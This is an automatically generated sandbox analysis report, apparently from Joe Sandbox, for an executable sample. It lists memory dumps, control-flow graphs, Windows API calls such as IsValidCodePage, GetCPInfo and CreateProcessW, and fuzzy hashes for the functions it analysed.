                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                • API String ID: 3013587201-537541572
                                                                                                                                                                                                                • Opcode ID: 2f2c060fe260cb324cbfd5daf3e2b6810ab47f0f51b7d2efba706c84bfec6660
                                                                                                                                                                                                                • Instruction ID: a4ddf21514cb25315dc39b6f641f30088c4072fbcd342943f51f19e981447ee8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2f2c060fe260cb324cbfd5daf3e2b6810ab47f0f51b7d2efba706c84bfec6660
                                                                                                                                                                                                                • Instruction Fuzzy Hash: EE41B621B1960241EA15EB2A99006BDE791BF49BB0FD54937DE0D57B94DE3CE4478330

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 91 7ff7d77f9cdc-7ff7d77f9d0f call 7ff7d77f9638 94 7ff7d77f9d15-7ff7d77f9d22 91->94 95 7ff7d77f9f69-7ff7d77f9f6c call 7ff7d77f96b8 91->95 97 7ff7d77f9d25-7ff7d77f9d27 94->97 98 7ff7d77f9f71 95->98 99 7ff7d77f9e73-7ff7d77f9ea1 call 7ff7d78013c0 97->99 100 7ff7d77f9d2d-7ff7d77f9d38 97->100 101 7ff7d77f9f73-7ff7d77f9f98 call 7ff7d77f1030 98->101 109 7ff7d77f9ea4-7ff7d77f9eaa 99->109 100->97 103 7ff7d77f9d3a-7ff7d77f9d40 100->103 106 7ff7d77f9d46-7ff7d77f9d51 IsValidCodePage 103->106 107 7ff7d77f9e6b-7ff7d77f9e6e 103->107 106->107 110 7ff7d77f9d57-7ff7d77f9d5e 106->110 107->101 111 7ff7d77f9eac-7ff7d77f9eaf 109->111 112 7ff7d77f9eea-7ff7d77f9ef4 109->112 113 7ff7d77f9d86-7ff7d77f9d95 GetCPInfo 110->113 114 7ff7d77f9d60-7ff7d77f9d6e 110->114 111->112 118 7ff7d77f9eb1-7ff7d77f9ebc 111->118 112->109 117 7ff7d77f9ef6-7ff7d77f9f02 112->117 115 7ff7d77f9e5f-7ff7d77f9e65 113->115 116 7ff7d77f9d9b-7ff7d77f9dbb call 7ff7d78013c0 113->116 119 7ff7d77f9d72-7ff7d77f9d81 114->119 115->95 115->107 134 7ff7d77f9e55 116->134 135 7ff7d77f9dc1-7ff7d77f9dca 116->135 121 7ff7d77f9f04-7ff7d77f9f07 117->121 122 7ff7d77f9f2d 117->122 123 7ff7d77f9ee2-7ff7d77f9ee8 118->123 124 7ff7d77f9ebe 118->124 125 7ff7d77f9f5f-7ff7d77f9f62 call 7ff7d77f9750 119->125 128 7ff7d77f9f24-7ff7d77f9f2b 121->128 129 7ff7d77f9f09-7ff7d77f9f0c 121->129 130 7ff7d77f9f34-7ff7d77f9f47 122->130 123->111 123->112 126 7ff7d77f9ec2-7ff7d77f9ec9 124->126 132 7ff7d77f9f67 125->132 126->123 133 7ff7d77f9ecb-7ff7d77f9ee0 126->133 128->130 136 7ff7d77f9f0e-7ff7d77f9f10 129->136 137 7ff7d77f9f1b-7ff7d77f9f22 129->137 138 7ff7d77f9f4c-7ff7d77f9f5d 130->138 132->98 133->123 133->126 141 7ff7d77f9e57-7ff7d77f9e5a 134->141 139 7ff7d77f9dcc-7ff7d77f9dcf 135->139 140 7ff7d77f9df8-7ff7d77f9dfc 135->140 136->130 142 7ff7d77f9f12-7ff7d77f9f19 136->142 137->130 138->125 138->138 139->140 143 7ff7d77f9dd1-7ff7d77f9dda 139->143 144 7ff7d77f9e01-7ff7d77f9e0a 140->144 141->119 142->130 145 7ff7d77f9df0-7ff7d77f9df6 143->145 146 7ff7d77f9ddc-7ff7d77f9de1 143->146 144->144 147 7ff7d77f9e0c-7ff7d77f9e15 144->147 145->139 145->140 148 7ff7d77f9de4-7ff7d77f9dee 146->148 149 7ff7d77f9e45 147->149 150 7ff7d77f9e17-7ff7d77f9e1a 147->150 148->145 148->148 151 7ff7d77f9e4c-7ff7d77f9e53 149->151 152 7ff7d77f9e3c-7ff7d77f9e43 150->152 153 7ff7d77f9e1c-7ff7d77f9e1f 150->153 151->141 152->151 154 7ff7d77f9e33-7ff7d77f9e3a 153->154 155 7ff7d77f9e21-7ff7d77f9e23 153->155 154->151 156 7ff7d77f9e25-7ff7d77f9e28 155->156 157 7ff7d77f9e2a-7ff7d77f9e31 155->157 156->151 157->151
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FF7D77F9638: GetOEMCP.KERNEL32(?,?,?,?,?,?,FFFFFFFD,00007FF7D77F9974), ref: 00007FF7D77F9662
                                                                                                                                                                                                                • IsValidCodePage.KERNEL32(?,?,?,00000001,?,00000000,COMSPEC,00007FF7D77F9AA5), ref: 00007FF7D77F9D49
                                                                                                                                                                                                                • GetCPInfo.KERNEL32(?,?,?,00000001,?,00000000,COMSPEC,00007FF7D77F9AA5), ref: 00007FF7D77F9D8D
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CodeInfoPageValid
                                                                                                                                                                                                                • String ID: COMSPEC
                                                                                                                                                                                                                • API String ID: 546120528-1631433037
                                                                                                                                                                                                                • Opcode ID: 3af343390b77110a02a506cd19370eeab66c9a9a0b233950a6eb876c2411c606
                                                                                                                                                                                                                • Instruction ID: 6540c6aaf631036410f68b81346826907ab12c6b16b61b5611957d49dec226b9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3af343390b77110a02a506cd19370eeab66c9a9a0b233950a6eb876c2411c606
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2681F362A0C68282EB64AF25D14427DFBE1EB49750FD44437DE8E87690DE3DE553CB20

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: String
                                                                                                                                                                                                                • String ID: LCMapStringEx
                                                                                                                                                                                                                • API String ID: 2568140703-3893581201
                                                                                                                                                                                                                • Opcode ID: db6ebe94a415d6a03d904cc959e4b9e1f838ccd974c526e1b6ecebf4d59b73bd
                                                                                                                                                                                                                • Instruction ID: 6e9e48a6e2d8b298fb77f6277186733b9dd49939a91028c6ba7a1f68e2fd93bf
                                                                                                                                                                                                                • Opcode Fuzzy Hash: db6ebe94a415d6a03d904cc959e4b9e1f838ccd974c526e1b6ecebf4d59b73bd
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 29214C35608B8186D760DB16B48069AF7A5FB88BD0F944136EE8D53B29DF3CD4518B10

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1703294689-0
                                                                                                                                                                                                                • Opcode ID: 418c26ef4a93b74874d8136e03d787bb323774ff48da52fbb78717f422105309
                                                                                                                                                                                                                • Instruction ID: 39e7921c0c9996e791eb2ba73f5192fdd2f7b73ed8688312d04fcab0469c58bf
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 418c26ef4a93b74874d8136e03d787bb323774ff48da52fbb78717f422105309
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FCD01710B09A0242EA243B70594517C82A13F4C712BC01C3ECC0B62383CD2CA41F4220

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Info
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1807457897-3916222277
                                                                                                                                                                                                                • Opcode ID: 9702de0ee23d9cfe9660e37e600eb8c80be4f13ea7386c82deb4e47b0cc5b9a7
                                                                                                                                                                                                                • Instruction ID: 00f2b40897c3e98d525910e6b2ef25060cf824ff2e5b20aa2f004ebe4b28a030
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9702de0ee23d9cfe9660e37e600eb8c80be4f13ea7386c82deb4e47b0cc5b9a7
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6B518E72A1C6C19AE7219F24D1843ADFBA0F748754FD4453ADA8D83A85CB3CD556CB20

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FileHandleType
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3000768030-0
                                                                                                                                                                                                                • Opcode ID: 8457bcf0b0f19edba7e93e74d16084af20cc6611793b13a120dc7196f517a12f
                                                                                                                                                                                                                • Instruction ID: 61ebb3e32720389e16669803aa632a1bb3a25fffef87b03283296bfa0705ea8f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8457bcf0b0f19edba7e93e74d16084af20cc6611793b13a120dc7196f517a12f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A9317421E18B4542E7609F14869017CEA50FB8ABB0BE5072BDF6E173E4CF39E4A2D350

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 271 7ff7d77fce58-7ff7d77fceef call 7ff7d77f808c 274 7ff7d77fcef1-7ff7d77fcef6 271->274 275 7ff7d77fcf09-7ff7d77fcf10 call 7ff7d77fb880 271->275 276 7ff7d77fcf04-7ff7d77fcf07 274->276 277 7ff7d77fcef8-7ff7d77fcefd 274->277 282 7ff7d77fcf12-7ff7d77fcf17 275->282 283 7ff7d77fcf2d-7ff7d77fcf32 275->283 279 7ff7d77fcf43-7ff7d77fcf56 call 7ff7d77f7f10 276->279 277->276 289 7ff7d77fd0bd 279->289 290 7ff7d77fcf5c-7ff7d77fcf70 call 7ff7d77f808c 279->290 287 7ff7d77fcf25-7ff7d77fcf2b 282->287 288 7ff7d77fcf19-7ff7d77fcf1e 282->288 284 7ff7d77fcf34-7ff7d77fcf39 283->284 285 7ff7d77fcf40 283->285 284->285 285->279 287->279 288->287 292 7ff7d77fd0c0-7ff7d77fd0c4 289->292 298 7ff7d77fcf72-7ff7d77fcf77 290->298 299 7ff7d77fcf8a-7ff7d77fcf91 call 7ff7d77fb880 290->299 294 7ff7d77fd0c6-7ff7d77fd0c9 call 7ff7d77f71dc 292->294 295 7ff7d77fd0ce-7ff7d77fd0d2 292->295 294->295 296 7ff7d77fd0d4-7ff7d77fd0d8 call 7ff7d77f71dc 295->296 297 7ff7d77fd0dd-7ff7d77fd0e1 295->297 296->297 302 7ff7d77fd0e3-7ff7d77fd0e7 call 7ff7d77f71dc 297->302 303 7ff7d77fd0ec-7ff7d77fd10e 297->303 304 7ff7d77fcf85-7ff7d77fcf88 298->304 305 7ff7d77fcf79-7ff7d77fcf7e 298->305 311 7ff7d77fcf93-7ff7d77fcf98 299->311 312 7ff7d77fcfae-7ff7d77fcfb3 299->312 302->303 308 7ff7d77fcfc4-7ff7d77fcfd7 call 7ff7d77f7f10 304->308 305->304 308->289 318 7ff7d77fcfdd-7ff7d77fcfe7 308->318 313 7ff7d77fcfa6-7ff7d77fcfac 311->313 314 7ff7d77fcf9a-7ff7d77fcf9f 311->314 315 7ff7d77fcfb5-7ff7d77fcfba 312->315 316 7ff7d77fcfc1 312->316 313->308 314->313 315->316 316->308 319 7ff7d77fd071-7ff7d77fd0bb CreateProcessW 318->319 320 7ff7d77fcfed-7ff7d77fd001 call 7ff7d77f808c 318->320 319->292 323 7ff7d77fd003-7ff7d77fd008 320->323 324 7ff7d77fd018-7ff7d77fd01f call 7ff7d77fb880 320->324 325 7ff7d77fd051-7ff7d77fd06c call 7ff7d77f7f10 323->325 326 7ff7d77fd00a-7ff7d77fd016 323->326 330 7ff7d77fd021-7ff7d77fd026 324->330 331 7ff7d77fd03b-7ff7d77fd040 324->331 325->289 337 7ff7d77fd06e 325->337 326->325 333 7ff7d77fd034-7ff7d77fd039 330->333 334 7ff7d77fd028-7ff7d77fd02d 330->334 335 7ff7d77fd042-7ff7d77fd047 331->335 336 7ff7d77fd04e 331->336 333->325 334->333 335->336 336->325 337->319
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CreateProcess
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 963392458-0
                                                                                                                                                                                                                • Opcode ID: 4215a585b414b005bd97d4a36c1c909f05baa03a975093ad59d75518a7a8c7a1
                                                                                                                                                                                                                • Instruction ID: f5e0be06a21a14a17b2e1f9e4fb68828806c623f49a5c1d8b8f1ae7eca665fc5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4215a585b414b005bd97d4a36c1c909f05baa03a975093ad59d75518a7a8c7a1
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 57819637A087818AE7109B65E5401AEFBE4F7487A8F940537DF8817BA8DF38D456C710

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3947729631-0
                                                                                                                                                                                                                • Opcode ID: b616f563cc8fa832ee263592121d95a50f483c6cab661a2b025e3d2b058bb068
                                                                                                                                                                                                                • Instruction ID: 9ceb16be43e44e1d56ada5de70756d1f6d18efa797f462b427c614ec0406903a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b616f563cc8fa832ee263592121d95a50f483c6cab661a2b025e3d2b058bb068
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 76219F32E08A018DEB24AF64C4402ACB3A0FB48328F840E36DA1C47BC6EF38D546C760

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(?,?,00000000,00007FF7D77F876A,?,?,00000000,00007FF7D77F71C5,?,?,?,?,00007FF7D77F7251), ref: 00007FF7D77F8945
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AllocHeap
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 4292702814-0
                                                                                                                                                                                                                • Opcode ID: ff9a0649186f7903886a12b3afb26e01b779ef78c2db2541cf97622d570a0ff3
                                                                                                                                                                                                                • Instruction ID: 2a2eaae4e0a94dc84e40b9912eed29683c8eb2f08ce043cdfdfefd8108d4f217
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ff9a0649186f7903886a12b3afb26e01b779ef78c2db2541cf97622d570a0ff3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A3F03704B4921341FE55B7A59A512FDD2842F8CBA0FC84D36CD1E8A2C2DE1CF5524232
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                • String ID: COMSPEC
                                                                                                                                                                                                                • API String ID: 1239891234-1631433037
                                                                                                                                                                                                                • Opcode ID: 51178ebc8e53b6e4353f01a20e97e9a09147ba2b4be2c88f445a7f32260a6ae7
                                                                                                                                                                                                                • Instruction ID: 29894e9c438e5adf1d33578c1470a9dcebce4a3d7a84c341839632f4afd0bd97
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 51178ebc8e53b6e4353f01a20e97e9a09147ba2b4be2c88f445a7f32260a6ae7
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 68316336608B8186D760DF25E8403AEB7A0FB887A5FD00536EA9D53B58DF3CC156C710
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3140674995-0
                                                                                                                                                                                                                • Opcode ID: 1e2cc736c57cc4fab42b8577c53b5fc89e16aa7390849912aa6135476777de7e
                                                                                                                                                                                                                • Instruction ID: d206b97995c8c4f99ed81df804e481e1683a4d3aca6636d2954e4d526e0f1878
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1e2cc736c57cc4fab42b8577c53b5fc89e16aa7390849912aa6135476777de7e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 63316072605B8186EB609F60E8403EDB7B1FB44755F84443ADA4D57B98DF3CC159C720
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2933794660-0
                                                                                                                                                                                                                • Opcode ID: 6ef71be0335d771916a3e36a0986b7e559f500fd36b780a2cbd914a71aaf017c
                                                                                                                                                                                                                • Instruction ID: 285a3ee92abd902bf29ce18c8306c66b75c0fe4acf769e89191b4174799d4a44
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6ef71be0335d771916a3e36a0986b7e559f500fd36b780a2cbd914a71aaf017c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DD115E22B15F018AEB00DF60E8442BC77A4FB19759F840E36EA2D52BA4DF3CD16A8350
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(?,?,00000001,00007FF7D77F13C5,?,?,?,?,?,?,00007FF7D77F6EF7), ref: 00007FF7D77F12CF
                                                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(?,?,00000001,00007FF7D77F13C5,?,?,?,?,?,?,00007FF7D77F6EF7), ref: 00007FF7D77F12D8
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,?,00000001,00007FF7D77F13C5,?,?,?,?,?,?,00007FF7D77F6EF7), ref: 00007FF7D77F12DE
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
